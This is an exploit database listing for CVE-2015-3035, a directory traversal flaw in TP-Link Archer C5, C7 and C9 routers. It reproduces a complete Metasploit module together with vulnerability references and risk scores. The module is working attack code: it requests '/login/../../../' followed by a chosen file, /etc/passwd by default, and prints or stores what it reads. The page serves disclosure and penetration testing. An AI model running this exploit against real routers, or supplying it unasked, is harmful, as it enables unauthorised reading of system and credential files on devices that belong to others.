Archer C7 Directory Traversal

🗓️ 31 Aug 2024 00:00:00Reported by Nick Cottrell, Anna Graterol, Mana Mostaani, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 152 Views

Exploits directory traversal vulnerability in Archer C7 routers

Reporter	Title	Published	Views	Family All 22
ATTACKERKB	CVE-2015-3035	22 Apr 201500:00	–	attackerkb
BDU FSTEC	The vulnerability of the microprogramming software of TP-Link Archer C5, C7, C8, C9, TL-WR740N, TL-WR741ND, TL-WR841N, TL-WR841ND, TL-WR841ND (9.0), and TL-WR841ND allows a hacker to bypass authentication procedures and read or write arbitrary files into the system.	6 Mar 202300:00	–	bdu_fstec
Circl	CVE-2015-3035	5 Jun 202316:20	–	circl
CISA KEV Catalog	TP-Link Multiple Archer Devices Directory Traversal Vulnerability	25 Mar 202200:00	–	cisa_kev
CNVD	Multiple TP-LINK Product Catalog Traversal Vulnerability	14 Apr 201500:00	–	cnvd
CVE	CVE-2015-3035	17 Apr 201518:00	–	cve
Cvelist	CVE-2015-3035	17 Apr 201518:00	–	cvelist
Metasploit	Archer C7 Directory Traversal Vulnerability	5 Jun 202319:50	–	metasploit
Metasploit	Archer C7 Directory Traversal Vulnerability	1 Jun 202319:50	–	metasploit
Nuclei	TP-LINK - Local File Inclusion	11 Jun 202603:33	–	nuclei

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Deprecated  
moved_from 'auxiliary/scanner/http/archer_c7_traversal'  
  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Archer C7 Directory Traversal Vulnerability',  
'Description' => %q{  
This module exploits a directory traversal vulnerability in the PATH_INFO found at /login/  
on TP-Link Archer C5, C7, and C9 routers of varying versions.  
},  
'References' => [  
[ 'BID', '74050 ' ],  
[ 'CVE', '2015-3035' ]  
],  
'Author' => [ 'Nick Cottrell <ncottrellweb[at]gmail.com>', 'Anna Graterol <annagraterol95[at]gmail.com>', 'Mana Mostaani <mana.mostaani[at]gmail.com>' ],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2015-04-08',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => []  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('FILE', [true, 'The file to retrieve', '/etc/passwd']),  
OptBool.new('SAVE', [false, 'Save the HTTP body', false]),  
]  
)  
end  
  
def check  
res = send_request_raw({  
'method' => 'GET',  
'uri' => '/'  
})  
return Exploit::CheckCode::Unknown unless res  
  
device_title = res.get_html_document&.at('//title')&.text  
if device_title =~ /Archer C\d/  
return Exploit::CheckCode::Appears("Target device '#{device_title}'")  
end  
  
Exploit::CheckCode::Safe('Target does not appear to be an Archer Cx router.')  
end  
  
def run  
uri = normalize_uri('/login/../../../', datastore['FILE'])  
print_status("Grabbing data at #{uri}")  
res = send_request_raw({  
'method' => 'GET',  
'uri' => uri.to_s  
})  
  
fail_with(Failure::Unreachable, 'Connection failed') unless res  
  
fail_with(Failure::NotFound, 'The file does not appear to exist') if res.body.to_s.include?('Error 404 requested page cannot be found')  
  
# We don't save the body by default, because there's also other junk in it.  
# But we still have a SAVE option just in case  
print_good("#{datastore['FILE']} retrieved")  
print_line(res.body)  
  
if datastore['SAVE']  
p = store_loot(  
'archer_c7.file',  
'application/octet-stream',  
rhost,  
res.body,  
::File.basename(datastore['FILE'])  
)  
print_good("File saved as: #{p}")  
end  
end  
end  
`

31 Aug 2024 00:00Current

7High risk

Vulners AI Score7

CVSS 3.17.5

CVSS 27.8

EPSS0.92455

metasploit tp-link archer c7 c5 c9 vulnerability http file retrieval bid cve 2015-3035 directory traversal security